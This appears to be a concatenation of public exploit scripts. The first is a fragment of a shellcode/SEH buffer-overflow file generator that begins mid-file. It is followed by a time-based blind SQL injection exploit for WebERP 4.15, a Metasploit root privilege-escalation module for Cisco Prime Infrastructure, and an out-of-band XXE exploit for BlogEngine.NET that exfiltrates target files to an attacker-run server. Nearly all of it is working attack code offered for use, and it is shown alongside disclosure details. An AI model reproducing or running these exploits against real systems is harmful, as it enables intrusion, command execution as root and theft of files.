"\x65\x97\x9c\x26\x76\x84\xdd\x29\xf4\xd7\x31\x89\xc5" "\x17\x44\xc8\x02\x45\xa5\x98\xdb\x01\x18\x0c\x6f\x5f" "\xa1\xa7\x23\x71\xa1\x54\xf3\x70\x80\xcb\x8f\x2a\x02" "\xea\x5c\x47\x0b\xf4\x81\x62\xc5\x8f\x72\x18\xd4\x59" "\x4b\xe1\x7b\xa4\x63\x10\x85\xe1\x44\xcb\xf0\x1b\xb7" "\x76\x03\xd8\xc5\xac\x86\xfa\x6e\x26\x30\x26\x8e\xeb" "\xa7\xad\x9c\x40\xa3\xe9\x80\x57\x60\x82\xbd\xdc\x87" "\x44\x34\xa6\xa3\x40\x1c\x7c\xcd\xd1\xf8\xd3\xf2\x01" "\xa3\x8c\x56\x4a\x4e\xd8\xea\x11\x07\x2d\xc7\xa9\xd7" "\x39\x50\xda\xe5\xe6\xca\x74\x46\x6e\xd5\x83\xa9\x45" "\xa1\x1b\x54\x66\xd2\x32\x93\x32\x82\x2c\x32\x3b\x49" "\xac\xbb\xee\xe4\xa4\x1a\x41\x1b\x49\xdc\x31\x9b\xe1" "\xb5\x5b\x14\xde\xa6\x63\xfe\x77\x4e\x9e\x01\x7b\xa9" "\x17\xe7\xe9\xa5\x71\xbf\x85\x07\xa6\x08\x32\x77\x8c" "\x20\xd4\x30\xc6\xf7\xdb\xc0\xcc\x5f\x4b\x4b\x03\x64" "\x6a\x4c\x0e\xcc\xfb\xdb\xc4\x9d\x4e\x7d\xd8\xb7\x38" "\x1e\x4b\x5c\xb8\x69\x70\xcb\xef\x3e\x46\x02\x65\xd3" "\xf1\xbc\x9b\x2e\x67\x86\x1f\xf5\x54\x09\x9e\x78\xe0" "\x2d\xb0\x44\xe9\x69\xe4\x18\xbc\x27\x52\xdf\x16\x86" "\x0c\x89\xc5\x40\xd8\x4c\x26\x53\x9e\x50\x63\x25\x7e" "\xe0\xda\x70\x81\xcd\x8a\x74\xfa\x33\x2b\x7a\xd1\xf7" "\x5b\x31\x7b\x51\xf4\x9c\xee\xe3\x99\x1e\xc5\x20\xa4" "\x9c\xef\xd8\x53\xbc\x9a\xdd\x18\x7a\x77\xac\x31\xef" "\x77\x03\x31\x3a") pad ="C" * (6000 - len(buffer) - len(nseh+seh) - len(nops) -len(shellcode)) payload = buffer + nseh + seh + nops + shellcode + pad try: f=open("Evil.txt","w") print "[+] Creating %s bytes evil payload.." %len(payload) f.write(payload) f.close() print "[+] File created!" except: print "File cannot be created"

# Exploit Title: Blind SQL injection in WebERP. # Date: June 10, 2019 # Exploit Author: Semen Alexandrovich Lyhin (https://www.linkedin.com/in/semenlyhin/) # Vendor Homepage: http://www.weberp.org/ # Version: 4.15 # A malicious query can be sent in base64 encoding to unserialize() function. It can be deserialized as an array without any sanitization then. # After it, each element of the array is passed directly to the SQL query. import requests import base64 import os import subprocess from bs4 import BeautifulSoup import re import time import sys def generatePayload(PaidAmount="0",PaymentId="0"): #THIS FUNCTION IS INSECURE BY DESIGN ToSerialize = r"[\"%s\" => \"%s\"]" % (PaymentId, PaidAmount) return os.popen("php -r \"echo base64_encode(serialize(" + ToSerialize + "));\"").read() def getCookies(ip, CompanyNameField, usr, pwd): r = requests.get("http://" + ip + "/index.php") s = BeautifulSoup(r.text, 'lxml') m = re.search("FormID.*>", r.text) FormID = m.group(0).split("\"")[2] data = {"FormID":FormID,"CompanyNameField":CompanyNameField,"UserNameEntryField":usr,"Password":pwd,"SubmitUser":"Login"} r = requests.post("http://" + ip + "/index.php", data) return {"PHPSESSIDwebERPteam":r.headers["Set-Cookie"][20:46]} def addSupplierID(name, cookies, proxies): r = requests.get("http://" + ip + "/Suppliers.php", cookies=cookies) s = BeautifulSoup(r.text, 'lxml') m = re.search("FormID.*>", r.text) FormID = m.group(0).split("\"")[2] data = {"FormID":FormID,"New":"Yes","SupplierID":name,"SuppName":name,"SupplierType":"1","SupplierSince":"01/06/2019","BankPartics":"","BankRef":"0", "PaymentTerms":"20","FactorID":"0","TaxRef":"","CurrCode":"USD","Remittance":"0","TaxGroup":"1","submit":"Insert+New+Supplier"} requests.post("http://" + ip + "/Suppliers.php", data=data,cookies=cookies,proxies=proxies) def runExploit(cookies, supplier_id, payload, proxies): r = requests.get("http://" + ip + "/Payments.php", cookies=cookies) s = BeautifulSoup(r.text, 'lxml') m = re.search("FormID.*>", r.text) FormID = m.group(0).split("\"")[2] data = {"FormID":FormID, "CommitBatch":"2", "BankAccount":"1", "DatePaid":"01/06/2019", "PaidArray":payload} requests.post("http://" + ip + "/Payments.php?identifier=1559385755&SupplierID=" + supplier_id, data=data,cookies=cookies,proxies=proxies) if __name__ == "__main__": #proxies = {'http':'127.0.0.1:8080'} proxies = {} if len(sys.argv) != 6: print '(+) usage: %s <target> <path> <login> <password> <order>' % sys.argv[0] print '(+) eg: %s 127.0.0.1 "weberp/webERP/" admin weberp 1' % sys.argv[0] print 'Order means the number of company on the website. Can be gathered from the login page and usually equals 0 or 1' exit() ip = sys.argv[1] + "/" + sys.argv[2] #if don't have php, set Payload to the next one to check this time-based SQLi: YToxOntpOjA7czoyMzoiMCB3aGVyZSBzbGVlcCgxKT0xOy0tIC0iO30= #payload = generatePayload("0 where sleep(1)=1;-- -", "0") payload = generatePayload("0", "' or sleep(5) and '1'='1") #get cookies cookies = getCookies(ip, sys.argv[5], sys.argv[3], sys.argv[4]) addSupplierID("GARUMPAGE", cookies, proxies) t1 = time.time() runExploit(cookies, "GARUMPAGE", payload, proxies) t2 = time.time() if (t2-t1>4): print "Blind sqli is confirmed" else: print "Verify input data and try again"

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Post::File include Msf::Exploit::EXE include Msf::Exploit::FileDropper def initialize(info = {}) super( update_info( info, 'Name' => 'Cisco Prime Infrastructure Runrshell Privilege Escalation', 'Description' => %q{ This modules exploits a vulnerability in Cisco Prime Infrastructure's runrshell binary. The runrshell binary is meant to execute a shell script as root, but can be abused to inject extra commands in the argument, allowing you to execute anything as root. }, 'License' => MSF_LICENSE, 'Author' => [ 'Pedro Ribeiro <pedrib[at]gmail.com>', # First discovery 'sinn3r' # Metasploit module ], 'Platform' => ['linux'], 'Arch' => [ARCH_X86, ARCH_X64], 'SessionTypes' => ['shell', 'meterpreter'], 'DisclosureDate' => '2018-12-08', 'Privileged' => true, 'References' => [ ['URL', 'https://github.com/pedrib/PoC/blob/master/advisories/cisco-prime-infrastructure.txt#L56'], ], 'Targets' => [ [ 'Cisco Prime Infrastructure 3.4.0', {} ] ], 'DefaultTarget' => 0 )) register_advanced_options [ OptString.new('WritableDir', [true, 'A directory where we can write the payload', '/tmp']) ] end def exec_as_root(cmd) command_string = "/opt/CSCOlumos/bin/runrshell '\" && #{cmd} #'" vprint_status(cmd_exec(command_string)) end def exploit payload_name = "#{Rex::Text.rand_text_alpha(10)}.bin" exe_path = Rex::FileUtils.normalize_unix_path(datastore['WritableDir'], payload_name) print_status("Uploading #{exe_path}") write_file(exe_path, generate_payload_exe) unless file?(exe_path) print_error("Failed to upload #{exe_path}") return end register_file_for_cleanup(exe_path) print_status('chmod the file with +x') exec_as_root("/bin/chmod +x #{exe_path}") print_status("Executing #{exe_path}") exec_as_root(exe_path) end end

# Exploit Title: Out-of-band XML External Entity Injection on BlogEngine.NET # Date: 19 June 2019 # Exploit Author: Aaron Bishop # Vendor Homepage: https://blogengine.io/ # Version: v3.3.7 # Tested on: 3.3.7, 3.3.6 # CVE : 2019-10718 #1. Description #============== #BlogEngine.NET is vulnerable to an Out-of-Band XML External Entity #Injection attack on **/pingback.axd**. #2. Proof of Concept #============= #Host the following malicious DTD on a web server that is accessible to the #target system: #~~~ #<!ENTITY % p1 SYSTEM "file:///C:/Windows/win.ini"> #<!ENTITY % p2 "<!ENTITY e1 SYSTEM 'http://$LHOST/X?%p1;'>"> %p2 #~~~ #Submit a request to `pingback.axd` containing a malicious XML body: #~~~{command="REQUEST"} #POST /pingback.axd HTTP/1.1 #Host: $RHOST #Accept-Encoding: gzip, deflate #Connection: close #User-Agent: python-requests/2.12.4 #Accept: */* #Content-Type: text/xml #Content-Length: 131 #<?xml version="1.0"?> #<!DOCTYPE foo SYSTEM "http://$LHOST/ex.dtd"> #<foo>&e1;</foo> #<methodName>pingback.ping</methodName> #~~~ #The application will request the remote DTD and submit a subsequent request #containing the contents of the file: #~~~ #$RHOST - - [17/May/2019 12:03:32] "GET /ex.dtd HTTP/1.1" 200 - #$RHOST - - [17/May/2019 12:03:32] "GET #/X?;%20for%2016-bit%20app%20support%0D%0A[fonts]%0D%0A[extensions]%0D%0A[mci%20extensions]%0D%0A[files]%0D%0A[Mail]%0D%0AMAPI=1 #HTTP/1.1" 200 - #~~~ #! /usr/bin/env python3 import argparse import http.server import json import multiprocessing import os import re import requests import sys import time import urllib """ Exploit for CVE-2019-10718 CVE Identified by: Aaron Bishop Exploit written by: Aaron Bishop Submit a XML to the target, get the contents of the file in a follow up request from the target python3 CVE-2019-10718.py --rhost http://$RHOST --lhost $LHOST --lport $LPORT --files C:/Windows/win.ini C:/Users/Administrator/source/repos/BlogEngine.NET/BlogEngine/web.config C:/inetpub/wwwroot/iisstart.htm C:/Windows/iis.log C:/Users/Public/test.txt Requesting C:/Windows/win.ini ... $RHOST - - [16/May/2019 17:07:25] "GET /ex.dtd HTTP/1.1" 200 - $RHOST - - [16/May/2019 17:07:25] "GET /X?;%20for%2016-bit%20app%20support%0D%0A[fonts]%0D%0A[extensions]%0D%0A[mci%20extensions]%0D%0A[files]%0D%0A[Mail]%0D%0AMAPI=1 HTTP/1.1" 200 - Requesting C:/Users/Administrator/source/repos/BlogEngine.NET/BlogEngine/web.config ... $RHOST - - [16/May/2019 17:07:26] "GET /ex.dtd HTTP/1.1" 200 - Unable to read C:/Users/Administrator/source/repos/BlogEngine.NET/BlogEngine/web.config Requesting C:/inetpub/wwwroot/iisstart.htm ... $RHOST - - [16/May/2019 17:07:30] "GET /ex.dtd HTTP/1.1" 200 - Unable to read C:/inetpub/wwwroot/iisstart.htm Requesting C:/Windows/iis.log ... $RHOST - - [16/May/2019 17:07:34] "GET /ex.dtd HTTP/1.1" 200 - Unable to read C:/Windows/iis.log Requesting C:/Users/Public/test.txt ... $RHOST - - [16/May/2019 17:07:38] "GET /ex.dtd HTTP/1.1" 200 - $RHOST - - [16/May/2019 17:07:38] "GET /X?This%20is%20a%20test HTTP/1.1" 200 - """ xml = """<?xml version="1.0"?> <!DOCTYPE foo SYSTEM "http://{lhost}:{lport}/ex.dtd"> <foo>&e1;</foo> <methodName>pingback.ping</methodName> """ dtd = """<!ENTITY % p1 SYSTEM "file:///{fname}"> <!ENTITY % p2 "<!ENTITY e1 SYSTEM 'http://{lhost}:{lport}/X?%p1;'>"> %p2; """ proxies = { "http": "127.0.0.1:8080", "https": "127.0.0.1:8080" } file_queue = multiprocessing.Queue() response_queue = multiprocessing.Queue() response_counter = multiprocessing.Value('i', 0) class S(http.server.SimpleHTTPRequestHandler): server_version = 'A Patchey Webserver' sys_version = '3.1415926535897932384626433832795028841971693993751058209749445923078' error_message_format = 'Donde esta la biblioteca?' def _set_headers(self): self.send_response(200) self.send_header('Content-Type', 'application/xml') self.end_headers() def do_GET(self): if self.path.endswith(".dtd"): self._set_headers() self.wfile.write(dtd.format(fname=file_queue.get(), lhost=self.lhost, lport=self.lport).encode('utf-8')) elif self.path.startswith("/X"): self._set_headers() response_counter.value += 1 response_queue.put(self.path) self.wfile.write('<response>Thanks</response>'.encode('utf-8')) else: self._set_headers() self.wfile.write('<error>?</error>') def start_server(lhost, lport, server): httpd = http.server.HTTPServer((lhost, lport), server) httpd.serve_forever() def main(rhost, lhost, lport, files, timeout, proxy, output_dir): print(output_dir) if not output_dir: return for f in files: file_queue.put_nowait(f) server = S server.lhost, server.lport = lhost, lport p = multiprocessing.Process(target=start_server, args=(lhost,lport,server)) p.start() for num, f in enumerate(files): print("\nRequesting {} ...".format(f)) count = 0 r = requests.post(rhost + "/pingback.axd", data=xml.format(lhost=lhost, lport=lport), proxies=proxies if proxy else {}, headers={"Content-Type": "text/xml"}) response = True while num == response_counter.value: if count >= timeout: response = False response_counter.value += 1 print("Unable to read {}".format(f)) break time.sleep(1) count += 1 if response: os.makedirs(output_dir, exist_ok=True) with open("{}/{}".format(output_dir, os.path.splitdrive(f)[1].replace(':','').replace('/','_')), 'w') as fh: fh.write(urllib.parse.unquote(response_queue.get()).replace('/X?','')) p.terminate() if __name__ == "__main__": parser = argparse.ArgumentParser(description='Exploit CVE-2019-10718 OOB XXE') parser.add_argument('-r', '--rhost', action="store", dest="rhost", required=True, help='Target host') parser.add_argument('-l', '--lhost', action="store", dest="lhost", required=True, help='Local host') parser.add_argument('-p', '--lport', action="store", dest="lport", type=int, required=True, help='Local port') parser.add_argument('-f', '--files', nargs='+', default="C:/Windows/win.ini", help='Files to read on RHOST') parser.add_argument('-t', '--timeout', type=int, default=3, help='How long to wait before moving on to next file') parser.add_argument('-x', '--proxy', dest="proxy", action="store_true", default=False, help='Pass requests through a proxy') parser.add_argument('-o', '--output', nargs='?', default="./CVE-2019-10718", help='Output directory. Default ./CVE-2019-10718') args = parser.parse_args() if isinstance(args.files, str): args.files = [args.files] main(args.rhost, args.lhost, args.lport, args.files, args.timeout, args.proxy, args.output)